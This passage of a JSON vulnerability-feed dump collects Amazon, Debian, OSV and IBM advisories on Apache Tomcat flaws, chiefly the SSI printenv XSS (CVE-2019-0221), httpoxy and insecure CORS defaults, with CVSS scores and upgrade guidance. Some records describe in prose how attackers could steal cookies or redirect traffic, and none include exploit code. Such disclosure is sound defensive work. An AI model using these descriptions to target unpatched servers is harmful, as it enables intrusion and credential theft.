{"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-07-17T23:21:00", "type": "amazon", "title": "Important: tomcat8", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2019-07-25T18:35:00", "id": "ALAS-2019-1234", "href": "https://alas.aws.amazon.com/ALAS-2019-1234.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2021-10-22T12:13:20", "description": "Package : tomcat7\nVersion : 7.0.56-3+really7.0.94-1\nCVE ID : CVE-2019-0221\n\n\nNightwatch Cybersecurity Research team identified a XSS vulnerability\nin tomcat7. The SSI printenv command echoes user provided data without\nescaping. SSI is disabled by default. The printenv command is intended\nfor debugging and is unlikely to be present in a production website.\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n7.0.56-3+really7.0.94-1.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-05-30T08:24:55", "type": "debian", "title": "[SECURITY] [DLA 1810-1] tomcat7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2019-05-30T08:24:55", "id": "DEBIAN:DLA-1810-1:6874E", "href": "https://lists.debian.org/debian-lts-announce/2019/05/msg00044.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-10T15:46:21", "description": "Package : tomcat7\nVersion : 7.0.56-3+really7.0.94-1\nCVE ID : CVE-2019-0221\n\n\nNightwatch Cybersecurity Research team identified a XSS vulnerability\nin tomcat7. The SSI printenv command echoes user provided data without\nescaping. SSI is disabled by default. The printenv command is intended\nfor debugging and is unlikely to be present in a production website.\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n7.0.56-3+really7.0.94-1.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-05-30T08:24:55", "type": "debian", "title": "[SECURITY] [DLA 1810-1] tomcat7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2019-05-30T08:24:55", "id": "DEBIAN:DLA-1810-1:AF75C", "href": "https://lists.debian.org/debian-lts-announce/2019/05/msg00044.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-22T12:47:53", "description": "Package : tomcat8\nVersion : 8.0.14-1+deb8u15\nCVE ID : CVE-2016-5388 CVE-2018-8014 CVE-2019-0221\nDebian Bug : 929895 898935\n\n\nSeveral minor issues have been fixed in tomcat8, a Java Servlet and\nJSP engine.\n\nCVE-2016-5388\n\n Apache Tomcat, when the CGI Servlet is enabled, follows RFC 3875\n section 4.1.18 and therefore does not protect applications from\n the presence of untrusted client data in the HTTP_PROXY\n environment variable, which might allow remote attackers to\n redirect an application's outbound HTTP traffic to an arbitrary\n proxy server via a crafted Proxy header in an HTTP request, aka an\n "httpoxy" issue. The 'cgi' servlet now has a 'envHttpHeaders'\n parameter to filter environment variables.\n\nCVE-2018-8014\n\n The defaults settings for the CORS filter provided in Apache\n Tomcat are insecure and enable 'supportsCredentials' for all\n origins. It is expected that users of the CORS filter will have\n configured it appropriately for their environment rather than\n using it in the default configuration. Therefore, it is expected\n that most users will not be impacted by this issue.\n\nCVE-2019-0221\n\n The SSI printenv command in Apache Tomcat echoes user provided\n data without escaping and is, therefore, vulnerable to XSS. SSI is\n disabled by default. The printenv command is intended for\n debugging and is unlikely to be present in a production website.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-13T19:30:16", "type": "debian", "title": "[SECURITY] [DLA 1883-1] tomcat8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5388", "CVE-2018-8014", "CVE-2019-0221"], "modified": "2019-08-13T19:30:16", "id": "DEBIAN:DLA-1883-1:3E939", "href": "https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-25T11:31:55", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4596-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nDecember 27, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat8\nCVE ID : CVE-2018-8014 CVE-2018-11784 CVE-2019-0199 CVE-2019-0221 \n CVE-2019-12418 CVE-2019-17563\n\nSeveral issues were discovered in the Tomcat servlet and JSP engine, which\ncould result in session fixation attacks, information disclosure, cross-\nsite scripting, denial of service via resource exhaustion and insecure\nredirects.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 8.5.50-0+deb9u1. This update also requires an updated version\nof tomcat-native which has been updated to 1.2.21-1~deb9u1.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nFor the detailed security status of tomcat8 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/tomcat8\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-27T22:15:49", "type": "debian", "title": "[SECURITY] [DSA 4596-1] tomcat8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563"], "modified": "2019-12-27T22:15:49", "id": "DEBIAN:DSA-4596-1:D180A", "href": "https://lists.debian.org/debian-security-announce/2019/msg00250.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-07-21T08:18:33", "description": "\nNightwatch Cybersecurity Research team identified a XSS vulnerability\nin tomcat7. The SSI printenv command echoes user provided data without\nescaping. SSI is disabled by default. The printenv command is intended\nfor debugging and is unlikely to be present in a production website.\n\n\nFor Debian 8 Jessie, this problem has been fixed in version\n7.0.56-3+really7.0.94-1.\n\n\nWe recommend that you upgrade your tomcat7 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-05-30T00:00:00", "type": "osv", "title": "tomcat7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2022-07-21T05:52:40", "id": "OSV:DLA-1810-1", "href": "https://osv.dev/vulnerability/DLA-1810-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-11T05:37:08", "description": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-05-30T03:30:42", "type": "osv", "title": "Cross-site scripting in Apache Tomcat", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2023-03-11T05:37:06", "id": "OSV:GHSA-JJPQ-GP5Q-8Q6W", "href": "https://osv.dev/vulnerability/GHSA-jjpq-gp5q-8q6w", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-21T08:18:20", "description": "\nSeveral minor issues have been fixed in tomcat8, a Java Servlet and\nJSP engine.\n\n\n* [CVE-2016-5388](https://security-tracker.debian.org/tracker/CVE-2016-5388)\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875\n section 4.1.18 and therefore does not protect applications from\n the presence of untrusted client data in the HTTP\\_PROXY\n environment variable, which might allow remote attackers to\n redirect an application's outbound HTTP traffic to an arbitrary\n proxy server via a crafted Proxy header in an HTTP request, aka an\n httpoxy issue. The cgi servlet now has a envHttpHeaders\n parameter to filter environment variables.\n* [CVE-2018-8014](https://security-tracker.debian.org/tracker/CVE-2018-8014)\nThe defaults settings for the CORS filter provided in Apache\n Tomcat are insecure and enable supportsCredentials for all\n origins. It is expected that users of the CORS filter will have\n configured it appropriately for their environment rather than\n using it in the default configuration. Therefore, it is expected\n that most users will not be impacted by this issue.\n* [CVE-2019-0221](https://security-tracker.debian.org/tracker/CVE-2019-0221)\nThe SSI printenv command in Apache Tomcat echoes user provided\n data without escaping and is, therefore, vulnerable to XSS. SSI is\n disabled by default. The printenv command is intended for\n debugging and is unlikely to be present in a production website.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n8.0.14-1+deb8u15.\n\n\nWe recommend that you upgrade your tomcat8 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "osv", "title": "tomcat8 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014", "CVE-2016-5388", "CVE-2019-0221"], "modified": "2022-07-21T05:52:46", "id": "OSV:DLA-1883-1", "href": "https://osv.dev/vulnerability/DLA-1883-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:18:25", "description": "\nSeveral issues were discovered in the Tomcat servlet and JSP engine, which\ncould result in session fixation attacks, information disclosure, cross-site\nscripting, denial of service via resource exhaustion and insecure\nredirects.\n\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 8.5.50-0+deb9u1. This update also requires an updated version\nof tomcat-native which has been updated to 1.2.21-1~deb9u1.\n\n\nWe recommend that you upgrade your tomcat8 packages.\n\n\nFor the detailed security status of tomcat8 please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/tomcat8](https://security-tracker.debian.org/tracker/tomcat8)\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-27T00:00:00", "type": "osv", "title": "tomcat8 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12418", "CVE-2018-8014", "CVE-2019-0199", "CVE-2019-17563", "CVE-2018-11784", "CVE-2019-0221"], "modified": "2022-08-10T07:18:19", "id": "OSV:DSA-4596-1", "href": "https://osv.dev/vulnerability/DSA-4596-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-23T21:38:17", "description": "## Summary\n\nThe Jazz Team Server is shipped with/or supports versions of the Apache Tomcat web server which contains a security vulnerability that could potentially impact the following IBM Rational products deployed on Apache Tomcat: Collaborative Lifecycle Management (CLM), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rational Team Concert (RTC), Rational Quality Manager (RQM), Rational Rhapsody Design Manager (Rhapsody DM), and Rational Software Architect Design Manager (RSA DM).\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the SSI printenv command. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/161746> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 6.0 - 6.0.6,1 \n \nRational Quality Manager 6.0 - 6.0.6.1 \nRational Team Concert 6.0 - 6.0.6.1 \nRational DOORS Next Generation 6.0 - 6.0.6.1 \nRational Engineering Lifecycle Manager 6.0 - 6.0.6.1 \nRational Rhapsody Design Manager 6.0 - 6.0.6.1 \nRational Software Architect Design Manager 6.0 - 6.0.1\n\n## Remediation/Fixes\n\n**Step 1**. \nApply the latest ifix to your installed product version: \n \nFor the 6.0 - 6.0.6 releases:\n\n * Upgrade to[ version 6.0.6.1](<https://jazz.net/downloads/clm/releases/6.0.6.1>) or later. \n\n * Upgrade to version 6.0.6 iFix009 or later \n * [_Rational Collaborative Lifecycle Management 6.0.6 iFix009_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=6.0.6&platform=All&function=all>)\n * [_Rational DOORS Next Generation 6.0.6 iFix009_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+DOORS+Next+Generation&release=6.0.6&platform=All&function=all>)\n * [_Rational Quality Manager 6.0.6 iFix009_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Quality+Manager&release=6.0.6&platform=All&function=all>)\n * [_Rational Team Concert 6.0.6 iFix009_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Team+Concert&release=6.0.6&platform=All&function=all>)\n * Rational Engineering Lifecycle Manager:_ _Upgrade to version 6.0.5 and install server from [_CLM 6.0.6 iFix009_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=6.0.6&platform=All&function=all>)\n * Rational Rhapsody Design Manager:_ _Upgrade to version 6.0.5 and install server from [_CLM 6.0.6 iFix009_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=6.0.6&platform=All&function=all>)\n * Rational Software Architect Design Manager:_ _Upgrade to version 6.0.5 and install server from [_CLM 6.0.6 iFix009_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=6.0.6&platform=All&function=all>)\n * Or upgrade to version 6.0.2 iFix20 or later versions: \n * [_Rational DOORS Next Generation 6.0.2 iFix20_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+DOORS+Next+Generation&release=6.0.2&platform=All&function=all>)\n * [_Rational Quality Manager 6.0.2 iFix20_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Quality+Manager&release=6.0.2&platform=All&function=all>)\n * [_Rational Team Concert 6.0.2 iFix20_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Team+Concert&release=6.0.2&platform=All&function=all>)\n * [_Rational Collaborative Lifecycle Management 6.0.2 iFix20_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=6.0.2&platform=All&function=all>)\n * Rational Engineering Lifecycle Manager:_ _Upgrade to version 6.0.2 and install server from [_CLM 6.0.2 iFix20_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=6.0.2&platform=All&function=all>)\n * Rational Rhapsody Design Manager:_ _Upgrade to version 6.0.2 and install server from [_CLM 6.0.2 iFix20_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=6.0.2&platform=All&function=all>)\n * Rational Software Architect Design Manager:_ _Upgrade to version 6.0.2 and install server from [_CLM 6.0.2 iFix20_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Rational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=6.0.2&platform=All&function=all>)\n\n**Step 2: ** \nUpgrade your Apache Tomcat to **version 7.0.94 or later**. Perform [_How to update the Apache Tomcat server for IBM Rational products based on versions 3.0.1.6, 4.0.7 or later of IBM's Jazz technology_](<http://www.ibm.com/support/docview.wss?uid=swg21687641>) to apply the remediation. \n \nFor any prior versions of the products listed above, IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n \nIf the iFix is not found in the Fix Portal please contact IBM Support.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-28T18:35:50", "type": "ibm", "title": "Security Bulletin: Security vulnerability in Apache Tomcat affects multiple IBM Rational products based on IBM's Jazz technology", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2021-04-28T18:35:50", "id": "6B1C6EAA2CD3518A682D3056E09D4E1EA74C23C47C9F526F46AB4741F8D3E72F", "href": "https://www.ibm.com/support/pages/node/887285", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-23T21:46:07", "description": "## Summary\n\nJazz Team Server is shipped as a component of Jazz Reporting Service (JRS). Information about a security vulnerability affecting Jazz Team Server and Jazz-based products has been published in a security bulletin. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the SSI printenv command. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/161746> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nJRS 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.6.1 | Jazz Foundation 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.6.1 \n \n* Both JRS and Jazz Foundation are part of Rational Collaborative Lifecycle Management.\n\n## Remediation/Fixes\n\nConsult the [Security Bulletin: Security vulnerability in Apache Tomcat affects multiple IBM Rational products based on IBM's Jazz technology](<https://www-01.ibm.com/support/docview.wss?uid=ibm10887285>) for vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-06-19T19:35:02", "type": "ibm", "title": "Security Bulletin: Security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2019-0221)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2019-06-19T19:35:02", "id": 